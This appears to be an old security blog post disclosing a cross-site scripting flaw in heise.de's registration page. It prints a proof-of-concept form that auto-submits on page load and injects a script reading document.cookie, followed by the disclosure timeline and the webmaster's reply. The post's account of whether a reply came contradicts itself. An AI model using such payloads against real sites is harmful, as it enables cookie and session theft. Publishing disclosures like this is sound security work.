morph3us.org

As I already mentioned in a previous blog posting titled XSS on heise.de there was a XSS vulnerability on heise.de. I informed heise's webmaster about this bug on December 23, 2005 and received the answer mail which stated that this issue was addressed on January 06, 2006. It's almost unbelievable that this bug is still present to this day.

heise.de - a German news site for, amongst others, security related topics - is vulnerable for XSS (Cross Site Scripting). I contacted the webmaster of heise.de about this on December 23 but I did not receive an answer and the XSS vulnerability is still not addressed.

PoC:

<form method="post" action="http://www.heise.de/registration/"
  name="heise">
  <input type="text" name="uid" size="20" value=''>
  <input type="text" name="vorname" size="20"
 value='"><script>alert(document.cookie)</script>'>
  <input type="text" name="name" size="20"
 value='"><script>alert(document.cookie)</script>'>
</form>
<body onload="heise.submit();">

heise-xss-poc.txt

UPDATE: 2006-01-09: 20:26

Hallo Herr Waldegger,

vielen Dank für Ihren Hinweis. Aufgrund der Feiertage hat die Behebung leider etwas länger gedauert.

Mit freundlichen Grüßen
heise online
Webmaster

A while ago I uploaded a XHTML document containing several viable resources about Web Application Security from my bookmarks. I think most links will be usefull for people who are interested in web application security related topics.

Have a look..

http://morph3us.org/security/links/web-app-security.html